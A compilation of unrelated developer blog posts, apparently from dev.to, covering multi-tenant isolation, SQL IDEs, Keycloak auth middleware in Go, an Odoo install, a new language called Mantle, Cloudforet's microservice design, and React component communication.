id int64 5 1.93M | title stringlengths 0 128 | description stringlengths 0 25.5k | collection_id int64 0 28.1k | published_timestamp timestamp[s] | canonical_url stringlengths 14 581 | tag_list stringlengths 0 120 | body_markdown stringlengths 0 716k | user_username stringlengths 2 30 |
|---|---|---|---|---|---|---|---|---|
1,878,691 | How to Host Website on Netlify for FREE | Hosting a website on Netlify is a straightforward process. Here are the steps to get your site up and... | 0 | 2024-06-06T02:44:38 | https://dev.to/codevicky/launch-your-website-in-minutes-a-beginners-guide-to-hosting-on-netlify-1f28 | netlify, webhosting, hosting, tutorial | Hosting a website on Netlify is a straightforward process. Here are the steps to get your site up and running:
### Create a Netlify Account:
Go to [Netlify's website](https://www.netlify.com/) and sign up for a free account if you don't have one.
### Connect Your Git Repository:
- After logging in, click on "New site from Git".
- Connect to your Git provider `(GitHub, GitLab, or Bitbucket)` and authorize Netlify to access your repositories.
### Choose Your Repository:
- Select the repository that contains your website code.
- Netlify will automatically detect the build settings. If it doesn't, you can specify the build command and the publish directory (e.g., `npm run build` and `dist`).
### Build and Deploy:
- Click `"Deploy site"`. Netlify will start the build process and deploy your website.
- Once the build is complete, Netlify will provide you with a temporary URL where your site is live.
### Custom Domain (Optional):
- If you have a custom domain, you can add it to your Netlify site.
- Go to `"Domain settings"` in your site's dashboard.
- Click on `"Add custom domain"` and follow the instructions to configure your DNS settings.
### Continuous Deployment:
- Every time you push changes to your repository, Netlify will automatically rebuild and redeploy your site.
### Additional Features:
- **Form Handling:** Netlify offers built-in form handling without any backend code.
- **Redirects and Rewrites:** You can configure redirects and rewrites using a `_redirects` file or `netlify.toml`.
- **Environment Variables:** You can set environment variables for your build process in the site settings.
- **Functions:** Netlify supports serverless functions that can be used for dynamic back-end processing.
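As an illustration of the redirects feature mentioned above, a minimal `_redirects` file might look like this (the paths are hypothetical; see Netlify's redirect documentation for the full rule syntax):

```text
# 301 redirect from an old path to a new one
/old-page    /new-page    301

# Single-page-app fallback: serve index.html for every route
/*           /index.html  200
```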
### Example:
Here’s an example for deploying a simple static HTML site:
- Create a repository on GitHub and push your site’s code to it.
- Connect the repository to Netlify as described above.
- Since it’s a static site, you might not need any build command. You can directly specify the publish directory where your HTML files are located.
- Deploy and check your site.
That’s it! Your site should now be live on Netlify.
| codevicky |
1,878,683 | How to read the strategy backtest performance report | Today's market analysis platforms allow traders to quickly review a trading system. Whether looking... | 0 | 2024-06-06T02:25:56 | https://dev.to/fmzquant/how-to-read-the-strategy-backtest-performance-report-197b | backtest, trading, fmzquant, strategy | Today's market analysis platforms allow traders to quickly review a trading system. Whether looking at hypothetical results or actual trading data, there are hundreds of performance metrics that can be applied. These performance metrics are typically displayed in a strategy performance report, a compilation of data based on different mathematical aspects of a system's performance. Knowing what to look for in a strategy performance report can help traders analyze a system's strengths and weaknesses.
A strategy performance report is an objective evaluation of a trading system's performance. Traders can create strategy performance reports to analyze their actual trading results. A set of trading rules can also be applied to historical data to determine how the system would have performed during the specified period—a process called backtesting. Most market analysis platforms allow traders to create a strategy performance report during backtesting, a valuable tool for traders wishing to test a trading system before putting it to use in the market.
## Elements of a Strategy Performance Report
The "front page" of a strategy performance report is the performance summary. Figure 1 shows an example of a performance summary that includes a variety of performance metrics. The metrics are listed on the left side of the report; the corresponding calculations are found on the right side, separated into columns. The five key metrics of the report are underlined; we'll discuss them in detail later.

Figure 1 - The "front page" of a strategy performance report is the performance summary. The key metrics identified in this article appear underlined.
In addition to the performance summary seen in Figure 1, strategy performance reports may also include trade lists, periodical returns, and performance graphs. The trade list provides an account of each trade that was taken, including information such as the type of trade (long or short), the date and time, price, net profit, cumulative profit, and percent profit. The trade list allows traders to see exactly what happened during each trade.
Viewing the periodical returns for a system allows traders to see performance broken down into daily, weekly, monthly, or annual segments. This section is helpful in determining profits or losses for a specific time period. Traders can quickly assess how a system is performing on a daily, weekly, monthly, or annual basis. It is important to remember that in trading, it is the cumulative profits (or losses) that matter. Looking at one trading day or one trading week is not as significant as looking at the monthly and yearly data.
One of the quickest methods of analyzing strategy performance is the performance graph. This shows the trade data in a variety of ways, from a bar graph showing a monthly net profit to an equity curve. Either way, the performance graph provides a visual representation of all the trades in the period, allowing traders to quickly ascertain whether or not a system is performing up to standards. Figure 2 shows two performance graphs: one as a bar chart of monthly net profit; the other as an equity curve.

Figure 2 - Each performance graph represents the same trade data shown in different formats.
## Key Metrics of a Strategy Performance Report
A strategy performance report may contain a tremendous amount of information regarding a trading system's performance. While all of the statistics are important, it's helpful to narrow the initial scope to five key performance metrics:
- Total Net Profit
- Profit Factor
- Percent Profitable
- Average Trade Net Profit
- Maximum Drawdown
These five metrics provide a good starting point for testing a potential trading system or evaluating a live trading system.
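As a rough sketch of how the first four of these metrics relate to each other, here is a small Python example (the trade list is made up purely for illustration):

```python
def performance_summary(trade_pnl):
    """Compute key strategy metrics from a list of per-trade net profit/loss values."""
    wins = [p for p in trade_pnl if p > 0]
    gross_profit = sum(wins)
    gross_loss = -sum(p for p in trade_pnl if p < 0)  # expressed as a positive number
    return {
        "total_net_profit": gross_profit - gross_loss,
        "profit_factor": gross_profit / gross_loss if gross_loss else float("inf"),
        "percent_profitable": 100 * len(wins) / len(trade_pnl),
        "average_trade_net_profit": (gross_profit - gross_loss) / len(trade_pnl),
    }

# Hypothetical trade list: four winners, two losers
print(performance_summary([500, -200, 300, 700, -100, 400]))
```

A profit factor above one and a positive average trade net profit indicate a system that made money over the tested period.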
### Total Net Profit
The total net profit represents the bottom line for a trading system over a specified period of time. This metric is calculated by subtracting the gross loss of all losing trades (including commissions) from the gross profit of all winning trades. The formula would be:

So, in Figure 1, the total net profit is calculated as:

While many traders use total net profit as the primary means to measure trading performance, the metric alone can be deceptive. By itself, this metric cannot determine if a trading system is performing efficiently, nor can it normalize the results of a trading system based on the amount of risk that is sustained. While certainly a valuable metric, total net profit should be viewed in concert with other performance metrics.
### Profit Factor
The profit factor is defined as the gross profit divided by the gross loss (including commissions) for the entire trading period. This performance metric relates the amount of profit per unit of risk, with values greater than one indicating a profitable system. As an example, the strategy performance report shown in Figure 1 indicates the tested trading system has a profit factor of 1.98. This is calculated by dividing the gross profit by the gross loss:
$149,020 ÷ $75,215 = 1.98
This is a reasonable profit factor and signifies that this particular system produces a profit. We all know that not every trade will be a winner and that we will have to sustain losses. The profit factor metric helps traders analyze the degree to which wins are greater than losses.
$149,020 ÷ $159,000 = 0.94
The above equation shows the same gross profit as the first equation but substitutes a hypothetical value for the gross loss. In this case, the gross loss is greater than the gross profit, resulting in a profit factor that is less than one. This would be a losing system.
### Percent Profitable
The percent profitable metric is also known as the probability of winning. This metric is calculated by dividing the number of winning trades by the total number of trades for a specified period. As an equation:

In the example shown in Figure 1, the percent profitable would be:
102 (winning trades) ÷ 163 (total # of trades) = 62.58% (percent profitable)
The ideal value for the percent profitable metric will vary depending on the trader's style. Traders who typically go for larger moves, with greater profits, only require a low percent profitable value to maintain a winning system, because the trades that do win—that are profitable, that is—are usually quite large. This typically happens with the strategy known as trend trading. Those that follow this approach often find that as few as 40% of trades might make money and still produce a very profitable system because the trades that do win follow the trend and typically achieve large gains. The trades that do not win are usually closed for a small loss.
Intraday traders, and particularly scalpers, who look to gain a small amount on any one trade while risking a similar amount will require a higher percent profitable metric to create a winning system. This is due to the fact that the winning trades tend to be close in value to the losing trades; in order to "get ahead" there needs to be a significantly higher percent profitable. In other words, more trades need to be winners, since each win is relatively small.
### Average Trade Net Profit
The average trade net profit is the expectancy of the system: It represents the average amount of money that was won or lost per trade. The average trade net profit is calculated by dividing the total net profit by the total number of trades. As an equation:

In our example from Figure 1, the average trade net profit would be:
**$73,805 (total net profit) ÷ 163 (total # of trades) = $452.79 (average trade net profit)**
In other words, over time we could expect that each trade generated by this system will average $452.79. This takes into consideration both winning and losing trades since it is based on the total net profit.
This number can be skewed by an outlier, a single trade that creates a profit (or loss) many times greater than a typical trade. An outlier can create unrealistic results by overinflating the average trade net profit. One outlier can make a system appear significantly more (or less) profitable than it is statistically. The outlier can be removed to allow for more precise evaluation. If the success of the trading system in backtesting depends on an outlier, the system needs to be further refined.
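A quick illustration of how a single outlier skews this metric (all values are hypothetical):

```python
from statistics import mean

# Nine typical trades, then the same list with one outsized winner appended
typical = [120, -80, 150, -60, 90, -100, 110, -70, 130]
with_outlier = typical + [5000]

print(round(mean(typical), 2))       # expectancy of the typical trades
print(round(mean(with_outlier), 2))  # the outlier inflates the expectancy
```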
### Maximum Drawdown
The maximum drawdown metric refers to the "worst case scenario" for a trading period. It measures the greatest distance, or loss, from a previous equity peak. This metric can help measure the amount of risk incurred by a system and determine if a system is practical, based on account size. If the largest amount of money that a trader is willing to risk is less than the maximum drawdown, the trading system is not suitable for the trader. A different system, with a smaller maximum drawdown, should be developed.
This metric is important because it is a reality check for traders. Just about any trader could make a million dollars—if they could risk 10 million. The maximum drawdown metric needs to be in line with the trader's risk tolerance and trading account size.
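In code, the maximum drawdown is simply the largest peak-to-trough distance along the equity curve. A minimal sketch (the equity values are hypothetical):

```python
def max_drawdown(equity_curve):
    """Return the largest peak-to-trough decline along an equity curve."""
    peak = equity_curve[0]
    worst = 0
    for value in equity_curve:
        peak = max(peak, value)           # track the running equity peak
        worst = max(worst, peak - value)  # distance below that peak
    return worst

# Equity peaks at 11,800, then falls to 10,900 before recovering
print(max_drawdown([10000, 10500, 11200, 10800, 11800, 11000, 10900, 12500]))  # 900
```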
## The Bottom Line
Strategy performance reports, whether applied to historical or live trading results, can provide a powerful tool for assisting traders in evaluating their trading systems. While it is easy to pay attention to just the bottom line or total net profit (we all want to know how much money we're making), considering additional performance metrics can provide a more comprehensive view of a system's efficacy—and its ability to achieve our trading goals.
From: https://blog.mathquant.com/2019/05/09/5-3-how-to-read-the-strategy-backtest-performance-report.html | fmzquant |
1,878,687 | Is there any service extracts important keywords through text | Hello, it's my first post on dev community. I'm finding some service or tools, extracts important... | 0 | 2024-06-06T02:38:37 | https://dev.to/modjm/is-there-any-service-extracts-important-keywords-through-text-402o | llm, learning, gpt3 | Hello, this is my first post on the DEV community.
I'm looking for a service or tool that extracts important keywords from text. It would be even better if it supports Korean.
I'd appreciate any thoughts, good references, and guides! Thanks in advance!
| modjm |
1,878,686 | Docker + Portainer | Tool for management of container in Docker. Get container pull. docker pull... | 0 | 2024-06-06T02:27:13 | https://dev.to/thiagoeti/docker-portainer-kd0 | docker, portainer | A tool for managing containers in Docker.
#### Get container **pull**.
```console
docker pull "portainer/portainer"
```
#### Create **volume** for data.
```console
docker volume create "portainer"
ln -s "/var/lib/docker/volumes/portainer" "/data/volume/"
```
#### Create and **run** container.
```console
docker run --name "portainer" \
-p 9000:9000 \
-v "/var/run/docker.sock:/var/run/docker.sock" \
-v "portainer":"/data" \
--restart=always \
-d "portainer/portainer"
```
#### Start container.
```console
docker start "portainer"
```
#### Set a username and password on first access.
```console
user: portainer
password: ***
```
> Important: if the first access is not completed within 5 minutes of startup, it expires.
---
[https://github.com/thiagoeti/docker-portainer](https://github.com/thiagoeti/docker-portainer) | thiagoeti |
1,878,685 | Automating ChatGPT with a REST Service in Express and Puppeteer | Introduction Can you imagine interacting with ChatGPT through a simple and... | 0 | 2024-06-06T02:27:01 | https://dev.to/miguelcespedes/automatizando-chatgpt-con-un-servicio-rest-en-express-y-puppeteer-585n | ## Introduction
Can you imagine interacting with ChatGPT through a simple yet powerful REST service? With [ChatGPT-Connector](https://github.com/miguelcespedes/ChatGPT-Connector), you can make it happen! This project gives you a Node.js application and a `ChatGPTConnector` class so you can send prompts to ChatGPT and receive automated responses.

**Project description**
This project provides a Node.js application and a `ChatGPTConnector` class that lets you interact with ChatGPT and get responses to your prompts.
**Project structure**
The project is structured as follows:
```
ChatGPT-Connector
├── package.json
└── src
├── app.js
└── ChatGPTConnector.js
```
* `package.json`: The project's main configuration file, which includes dependencies, scripts, and other metadata.
* `src`: The source directory containing the application's JavaScript code.
* `app.js`: The main Express.js application file, which handles routing and the interaction with `ChatGPTConnector`.
* `ChatGPTConnector.js`: The class responsible for connecting to ChatGPT, sending prompts, and getting responses using Puppeteer.
**Installation**
To install and run the project, follow these steps:
**Prerequisites:**
* Make sure you have Node.js and npm installed on your system.
**Installing dependencies:**
1. Navigate to the project directory.
2. Run the following command to install the required dependencies:
```bash
npm install
```
This will install the `puppeteer` dependency, which is used to automate web interactions with ChatGPT.
**Running the application:**
To start the Express.js server and make the application accessible, run the following command:
```bash
npm start
```
This will start the server on port 80 by default. You can access the `http://localhost/client` endpoint to send prompts to ChatGPT and receive responses.
**Usage**
To use the project, you can send HTTP GET requests to the `/client` endpoint with a `prompt` parameter containing the text you want to send to ChatGPT. For example:
```bash
curl -X GET http://localhost/client?prompt=Hola,%20que%20hora%20ser%C3%A1%20en%20Par%C3%ADs?
```
This will send the prompt "Hola, que hora será en París?" ("Hi, what time will it be in Paris?") to ChatGPT and return its answer in the response.
**Additional notes**
* The `ChatGPTConnector` class is currently configured to run Puppeteer in visible mode. You may need to adjust the headless-mode setting to suit your preferences.
* Make sure you have a ChatGPT account and are logged in before using the application.
* The code provided is a basic example and can be extended to handle more complex interactions and error scenarios.
**Feel free to modify and adapt the project to fit your specific needs and requirements.**
| miguelcespedes | |
1,875,430 | How I Approach Tutorials To Avoid Tutorials Hell | Tutorials hell is floozy for luck of a better word. You are in an endless circle of tutorials, you... | 0 | 2024-06-06T02:27:00 | https://dev.to/thekarlesi/how-i-approach-tutorials-to-avoid-tutorials-hell-jbn | webdev, javascript, beginners, programming | Tutorials hell is floozy for luck of a better word.
You are in an endless cycle of tutorials: you are not learning anything, you are not getting anything done, you are not getting any better, and you are not getting any closer to your goal.
You are just stuck in a loop of tutorials. You are in tutorial hell.
In order to avoid tutorial hell, here are some tips I have learned over the years.
### Build small projects
A good way to avoid tutorial hell is to build small projects.
After watching a tutorial, build a small project based on what you have learned.
This will help you solidify your knowledge and avoid tutorial hell.
A trick I use when following a tutorial is to pause the video after every step and try to do the step myself.
Another way is to have a project in mind and follow a tutorial to build that project.
I can incorporate my learnings from different tutorials to build my project.
### Read the documentation
Another way to avoid tutorial hell is to read the documentation. The documentation is the best source of information.
It is the most accurate and up to date.
When stuck on a problem, I always try to find the answer in the documentation if I can't find it in a tutorial.
The documentation also expounds on the concepts in a tutorial.
This enables you to have a wide understanding of the topic.
### Teach yourself and others
Joseph Joubert said, "To teach is to learn twice."
Teaching others is a form of solidifying your knowledge.
When you teach others, you identify the gaps in your knowledge.
This enables you to fill those gaps. In the process, you learn more.
### Write technical blogs
Writing is the best way you can use to teach others.
There are many platforms you can use to write technical blogs.
You can write technical blogs on Medium, Dev.to, Hashnode, etc.
You get to build your portfolio and you get to solidify your knowledge.
Talk about killing two birds with one stone 😊.
See you in the next post.
Happy Coding!
Karl
P.S. If you liked this post, subscribe to [my newsletter](https://karlgusta.substack.com) to boost your career. | thekarlesi |
1,878,628 | Are multi-tenant apps = SaaS? | Should all SaaS apps employ multi-tenancy architectures? Can multi-tenancy architectures be applied... | 27,604 | 2024-06-06T01:43:03 | https://blog.logto.io/are-multi-tenant-apps-equal-saas/ | webdev, saas, opensource, identity | Should all SaaS apps employ multi-tenancy architectures? Can multi-tenancy architectures be applied to consumer apps?
---
# Multi-tenant apps’ broader definition
In the [last chapter](https://dev.to/logto/tenancy-models-for-a-multi-tenant-app-3429), we discussed multi-tenancy in a general sense. To summarize, when we refer to a multi-tenant app, it doesn't necessarily mean the app adheres to one architectural model; it might utilize various tenancy strategies, indicating that at least some of its components are shared.
In this chapter, we'll explore multi-tenant apps from a business and product standpoint.
# Types of multi-tenant apps in business
### SaaS
Multi-tenant apps often find their place in business-to-business (B2B) solutions like productivity tools, enterprise resource planning (ERP) systems, and other software-as-a-service (SaaS) products. In this context, each "tenant" typically represents a business customer, which could have multiple users (its employees). Additionally, a business customer might have multiple tenants to represent distinct organizations or business divisions.

### Generic B2B use cases
B2B applications go beyond SaaS products and often involve the use of multi-tenant apps. In B2B contexts, these apps serve as a common platform for various teams, business clients, and partner companies to access your applications.
For instance, consider a ride-sharing company that provides both B2C and B2B apps. The B2B apps serve multiple business clients, and employing a multi-tenant architecture can help manage their employees and resources. To illustrate, if the company wishes to maintain a unified user identity system, it can design an architecture like the following example:
Let's use Sarah as an example. Sarah has both a personal and a business identity. She uses the ride-sharing service as a passenger and also works as a driver in her spare time. In her professional role, she is associated with Company A, but she also manages her own personal business.

# The importance of multi-tenancy in SaaS
If you've been following the information above, you now have the answers you need. SaaS, or software as a service, is a concept defined from a business model viewpoint. Multi-tenancy, on the other hand, is a software architecture applicable in various situations, whether in SaaS or other B2B contexts.
The mix-up between SaaS and multi-tenancy often arises from a widely recognized industry belief: when you're aiming for enterprise clients, adopting a multi-tenant architecture is a must.
This emphasis on multi-tenancy is rooted in its substantial role in addressing the complexities that come with serving enterprises, offering valuable solutions from various angles.
### Scaling with multi-tenancy
For enterprise businesses, multi-tenancy is the key to effectively fulfilling their requirements for availability, resource management, cost management, and data security. On a technical level, adopting a multi-tenant approach streamlines your development processes, minimizes technical challenges, and promotes seamless expansion.
### Creating a unified experience
When examining the roots of SaaS products, it's akin to a building housing various apartments. All tenants share common utilities like water, electricity, and gas, yet they maintain independent control over managing their own space and resources. This approach simplifies property management.
Think of your SaaS product as this building. Instead of having separate agents for each unit, some components or units can offer a unified experience shared by all tenants. This is more efficient than individually crafting and managing each room. The multi-tenancy architecture offers advantages for both your business operation and your customers.
### Ensuring security through tenant isolation
When discussing multi-tenant applications, it's important to delve into the concept of tenant isolation. In a multi-tenancy architecture, the term "tenant" is introduced to create boundaries that separate and secure the resources and data of different tenants within a shared instance. This ensures that each tenant's data and operations remain distinct and secure, even if they are utilizing the same underlying resources.
In the context of SaaS, multi-tenant architecture employs mechanisms that tightly control access to resources and prevent any unauthorized attempts to access another tenant's resources.
The concept of tenant isolation might seem abstract and unclear. In the next chapter, we'll use examples and key points to provide a more detailed understanding of the principles and mindsets behind tenant isolation.
{% cta https://logto.io/?ref=dev %} Try Logto Cloud for free {% endcta %}
| palomino |
1,878,638 | 12 Ways to Use the @Value Annotation in Spring for Flexible and Maintainable Applications | You may already be familiar with @Value annotation from Spring. This annotation allows you to inject... | 27,602 | 2024-06-06T02:17:28 | https://springmasteryhub.com/2024/06/05/12-ways-to-use-the-value-annotation-in-spring-for-flexible-and-maintainable-applications/ | java, spring, tutorial, programming |
You may already be familiar with the @Value annotation from Spring. This annotation allows you to inject properties into your beans.
But there are many ways to do that, and maybe you are not familiar with all of them.
This article will show you many ways to work with @Value, including some new ones you can apply to your projects.
Let’s explore our options!
### 1. Basic property injection
This is the most used option in Spring projects. It’s the common way you can control feature flags, API keys, database connection details, etc.
Example:
```java
@Value("${feature.enableDarkMode}")
private boolean isDarkModeEnabled;
```
Properties:
```properties
feature.enableDarkMode=true
```
### 2. Hardcoded Values:
This approach sets the value as a constant in your code, so you cannot change it externally.
```java
@Value("localhost")
private String defaultServerAddress;
```
### 3. Constructor Injection
This is how you create immutable beans that need their dependencies and values upfront.
Example:
```java
public TestBean(@Value("${mail.smtp.server}") String smtpServer) {
this.smtpServer = smtpServer;
}
```
Properties:
```properties
mail.smtp.server=smtp.example.com
```
### 4. Set Up Default Values:
You can provide default values when injecting your properties to avoid application crashes. If the property is not set, the default value is picked automatically.
Example:
```java
@Value("${app.cache.ttl:60}") // Default TTL of 60 seconds if not configured
private int cacheTimeToLive;
```
### 5. Inject Using a Setter Method (Less Common)
In some legacy codebases where constructor injection is not possible, setter injection becomes an option.
Example:
```java
@Value("${log.level}")
public void setLogLevel(String logLevel) {
this.logLevel = logLevel;
}
```
Properties:
```properties
log.level=INFO
```
### 6. Injecting an Array of Values:
You can inject an array of values using a comma-separated property; Spring will automatically split the values and place them in the array. You can use this, for example, to configure an array of allowed origins via properties.
Example:
```java
@Value("${cors.allowedOrigins}")
private String[] allowedOrigins;
```
Properties:
```properties
cors.allowedOrigins=https://example1.com,https://example2.com
```
### 7. Injecting a List of Values:
If you want more flexibility in your Java code when injecting a collection of values, you can use SpEL to split the values and create a list.
Example:
```java
@Value("#{'${notification.channels}'.split(',')}")
private List<String> notificationChannels;
```
Properties:
```properties
notification.channels=EMAIL,SMS,PUSH
```
### 8. Inject Maps
You can inject a group of configurations that follow a key-value pattern into a Java map.
Example:
```java
@Value("#{${http.client.config}}")
private Map<String, Integer> httpClientConfig;
```
Properties:
```properties
http.client.config={timeout: 500, maxConnections: 100}
```
### 9. Inject a Single Value From a Map
Just as you can inject an entire map of values, you can use SpEL to inject a single value by its key.
Example:
```java
@Value("#{${http.client.config}['timeout']}")
private int timeout;
```
Properties:
```properties
http.client.config={timeout: 500, maxConnections: 100}
```
### 10. Access System Properties
This approach lets you read Java system properties, including all the properties you set when running the application with the `-D` parameter.
Example:
```java
@Value("#{systemProperties['java.home']}")
private String javaHome;
```
In this example, `java.home` is passed to the process automatically. But if you want to access a custom property, you can do this:
```java
@Value("#{systemProperties['custom.property']}")
private String customProperty;
```
Running the project with custom property:
```bash
java -Dcustom.property="value" -jar app.jar
```
### 11. Get Environment Variables:
You can read an environment variable from your system (if the application has access to the variable).
Example:
```java
@Value("#{environment['MY_ENV_VAR']}")
private String myEnvVar;
```
### 12. Use SpEL and Create Dynamic Properties
One common problem developers face is that team members can be working on different operating systems, so you can create a dynamic property based on the system to make things more flexible.
Example:
```java
@Value("#{systemProperties['os.name'].toLowerCase().contains('windows') ? 'C:\\' : '/'}")
private String rootDirectory;
```
This will get the `os.name` system property and decide which root directory value to inject.
That’s it! Now you have a whole set of new ways to configure your Spring applications with @Value!
That will give you more flexibility and more options, offering a solution that fits your needs. By understanding how @Value works, you can write more maintainable Spring applications.
Test out new ways of Injecting properties into your project!
If you like this topic, make sure to follow me. In the following days, I'll be explaining more about Spring annotations!
Stay tuned!
### References
1. [Baeldung: Spring @Value Annotation](https://www.baeldung.com/spring-value-annotation)
2. [Spring Framework Documentation: @Value Annotations](https://docs.spring.io/spring-framework/reference/core/beans/annotation-config/value-annotations.html)
3. [DigitalOcean: Spring @Value Annotation](https://www.digitalocean.com/community/tutorials/spring-value-annotation) | tiuwill |
1,878,636 | Level-up Your Git Projects with Gitflow | Take your project’s design and evolution to the next level by integrating Gitflow into your... | 0 | 2024-06-06T02:10:34 | https://dev.to/dedsyn4ps3/how-i-leveled-up-my-github-projects-with-gitflow-25k | programming, productivity, git, tooling | ## Take your project’s design and evolution to the next level by integrating Gitflow into your development process!

### In the Beginning
I’m fairly certain that many of you reading this are plenty familiar with the fantastic ecosystem that is Git, as well as some of the gigantic version control platforms such as Github and GitLab. That being said, there could still be some newbie programmers reading this article, and may need a quick primer on what Git is…so here’s your brief explanation:
> Git is a version control system that allows you to manage and keep track of your source code history. It’s like a time machine for your code, enabling you to save snapshots of your changes and collaborate with others. GitHub, on the other hand, is a cloud-based hosting service specifically designed for managing Git repositories. It provides a platform where developers can store, create, manage, and collaborate on code.
As I’m sure many of you can relate, getting new projects up and running can be a challenge…and I’m just talking about drafting out and writing the code! Like a lot of us come to find out, managing a codebase can be quite a bit more involved than one might think:
- First, you initialize your new repo and link it to a remote branch (if doing it locally)
- Then, you start writing some code…easy right?
- Next thing you know, your project is growing, new ideas emerge to add to the project…and of course, the occasional bug or hot-fix that may be necessary!
- Finally, you keep making changes bit by bit, then commit and push the changes to your remote, with the occasional tag here and there…then repeat…
**If the codebase isn’t all that large or complex, following such a straightforward development approach is more than likely going to be okay.** But what happens if your creative juices are flowing and your once-small project becomes more of a thriving repo with the potential for other collaborators to get involved, or perhaps you begin planning on packaging and distributing the code as it becomes more developed?
### Enter Workflows
**Lucky for us, there are several solutions for dealing with projects that grow in scope and complexity!** We'll be focusing primarily on one of these solutions, which has become a key piece in my own improved development life-cycle (as well as countless other developers). Before we dive into it, let's have a quick introduction into what all we're talking about here...

Some of you may or may not be familiar with the term workflow when it comes to project development strategy. I'm sure it rings a bell for many of you, whether you know exactly what it is or not:
> A workflow is an end-to-end process that...move[s] data (tasks) through a series of steps from initiation to completion. Once it’s set up, a workflow helps you organize information in a way that is not only understandable, but also repeatable.1
**When it comes to Git project development, there are three popular workflows that are typically implemented by developers and teams:**
- Centralized
- Feature Branch
- Gitflow
Each of these has their own pros and cons, and for many are reliable ways to effectively build and maintain projects. **Many of you will more than likely identify with using at least one of these workflows in your day to day coding experiences, even if you never knew it!**
1. **Centralized Workflow:**
- Uses a central repository (often named **main**) as the single point of entry for all changes.
- Developers commit directly to the **main** branch.
- Advantages: Simple and easy to understand.
2. **Feature Branch Workflow:**
- Developers create separate branches for individual features or bug fixes.
- Each feature branch is isolated and independent.
- After development, feature branches are merged back into the **`main`** branch.
- Advantages: Branch isolation as well as parallel development ability.
3. **Gitflow Workflow:**
- Extends the feature branch workflow.
- Introduces additional branches: **`develop`** (for ongoing development) and **`release`** (for release candidates).
- Feature branches are created from **`develop`** (or **`dev`**), and **`hotfix`** branches are based on **main**.
- Advantages: Clear structure, well-defined roles for branches, and support for both features and releases.
### Implementing Gitflow
How many of you immediately identified with a particular workflow after reading the previous section? I have a feeling many of you relate to using the first style of workflow, which is totally fine! What I hope to do here is expand your understanding of other common flows, in the event that your projects grow or you simply want a more organized structure for all your code.
Like many developers, I too was consistently using a Centralized Workflow for quite a long time. Once my projects started becoming significantly more complex, it became clear that a new flow had to be implemented...and the flow that worked best (and **continues** to work great) for these projects was **Gitflow**!
Getting started is pretty straightforward and painless for most, especially if you have _full control_ of your git repo (which from this point on, I will assume you have). There are only a handful of required actions that need to be taken when setting the flow up, **many of which can be done automatically depending on the code management platform you're using.**

As you can see in the above image, desktop Git applications such as **`GitKraken`** offer built-in Gitflow integration, making it extremely easy to implement Gitflow in your projects!
**My personal preference is to use GitKraken for all my desktop-based code management, though you're free to utilize whichever platform works well for you...**

If for some reason your desktop Git client doesn’t have the option to enable Gitflow, or perhaps you prefer sticking with the terminal…have no fear! There's a dedicated **`git-flow`** extension available to install using your system's package manager!
**Once installed, you can just as easily enable the flow in an existing repository or when creating a new one...**
```bash
# For Debian/Ubuntu Distros
sudo apt install -y git-flow
# For Archlinux
yay -S gitflow-avh
# Using Homebrew
brew install git-flow
```
### Putting it Together
Once we have either enabled Gitflow functionality in our desktop Git client, or installed it locally using our system’s package manager, it’s time to actually put it to use!
Using a desktop client such as GitKraken works out to be the simplest option, since all we need to do is enable it in our repository’s settings tab, and define what we want the various branches to be named. Once that’s done, we’re off to the races!
**When following the manual approach to things, we first need to initialize the flow in our repo and define what our various branches should be called using the `git-flow` CLI:**
```shell
# Enable Gitflow in our project
> git flow init
No branches exist yet. Base branches must be created now.
Branch name for production releases: [master] main
Branch name for "next release" development: [develop] dev
How to name your supporting branch prefixes?
Feature branches? [feature/] feat
Release branches? [release/]
Hotfix branches? [hotfix/] fix
Support branches? [support/]
Version tag prefix? []
```
Now that our new flow is enabled, we can go about developing our code as we normally would…for the most part! Remember, the whole purpose of implementing a Gitflow-styled development process is to better compartmentalize the various stages of the entire process:
- The core, stable codebase will always follow the **`main`** branch (or whatever you named it)
- Use the **`dev`** branch to make and push changes as you test and grow your project
- When something doesn’t work right after a **`dev`** commit, use the **`hotfix`** type branch to make corrections and merge into **`dev`**
- After accomplishing a milestone (i.e. finished a new component or code section), merge the current **`dev`** branch into **`main`**
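Under the hood, git-flow is only managing branches for you. As a sketch, here is the plain-git equivalent of one full feature cycle, run inside a throwaway repo (the `feat/search-bar` feature name is hypothetical; the `main`, `dev`, and `feat/` names match the prefixes chosen during `git flow init` above):

```shell
# Plain-git equivalent of `git flow feature start/finish search-bar`.
set -e
git init -q demo
git -C demo -c user.email=demo@example.com -c user.name=demo \
    commit -q --allow-empty -m "initial commit"               # stable base (main/master)
git -C demo branch dev                                        # ongoing-development branch
git -C demo checkout -q -b feat/search-bar dev                # feature start
git -C demo -c user.email=demo@example.com -c user.name=demo \
    commit -q --allow-empty -m "add search bar"               # work on the feature
git -C demo checkout -q dev                                   # feature finish:
git -C demo -c user.email=demo@example.com -c user.name=demo \
    merge -q --no-ff -m "merge feat/search-bar" feat/search-bar
git -C demo branch -d feat/search-bar                         #   ...then clean up the branch
```

With the `git-flow` CLI, that whole dance collapses into `git flow feature start search-bar` and `git flow feature finish search-bar`.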
### Any Thoughts?
Some of you may be wondering to yourselves: _**“What’s the point of doing all this?”**_. I’m glad you asked! While it may seem like a bit of extra work to enable and implement different branches in a project, doing so will help keep your code commits organized and your overall project more structured than a typical single-branch repo.
By maintaining such structure in your projects, _**you’ll without a doubt become a better developer that’s much better equipped to work on larger projects down the road**_…be they your own or even an internal corporate project!
**Current and potential employers alike typically appreciate seeing such well-structured code and commit histories that models like Gitflow produce…**

### Get to it!
Now that you have a better understanding of what Gitflow is, and how it can help you become a better developer, get out there and try it out! The important thing to remember is that while not **all** projects need to implement such a flow…many of them can and should.
Pick a project that you’ve been working on (or even start a new one), and follow the steps that apply to you to enable Gitflow. Once you do, see what kind of changes you experience while following this workflow!
**Do you find yourself better organizing your commits and code merges as your project grows in complexity? Perhaps you don’t think it makes much of a difference for the project you’re currently working on? It can happen sometimes!**

**1)** Martins, Julia. “Hitting Work Blocks? Try Workflows. [2024].” Asana, Asana, 17 Jan. 2024, asana.com/resources/workflow-examples.
<br>
{% embed https://dev.to/dedsyn4ps3 %}

*Author: dedsyn4ps3*

---

# Tenant isolation in multi-tenant application

*Published 2024-06-06 on https://blog.logto.io/tenant-isolation/ (tags: webdev, identity, saas, opensource)*

Tenant isolation is a key concept in multi-tenant applications. In this article, we'll discuss what it is and how it can be achieved.
---
Hello everyone! In this chapter, we'll build upon our earlier discussions on multi-tenant topics. If you haven't read the previous articles yet, we recommend starting with those first!
- [Are multi-tenant apps = SaaS?](https://dev.to/logto/are-multi-tenant-apps-saas-1ph1)
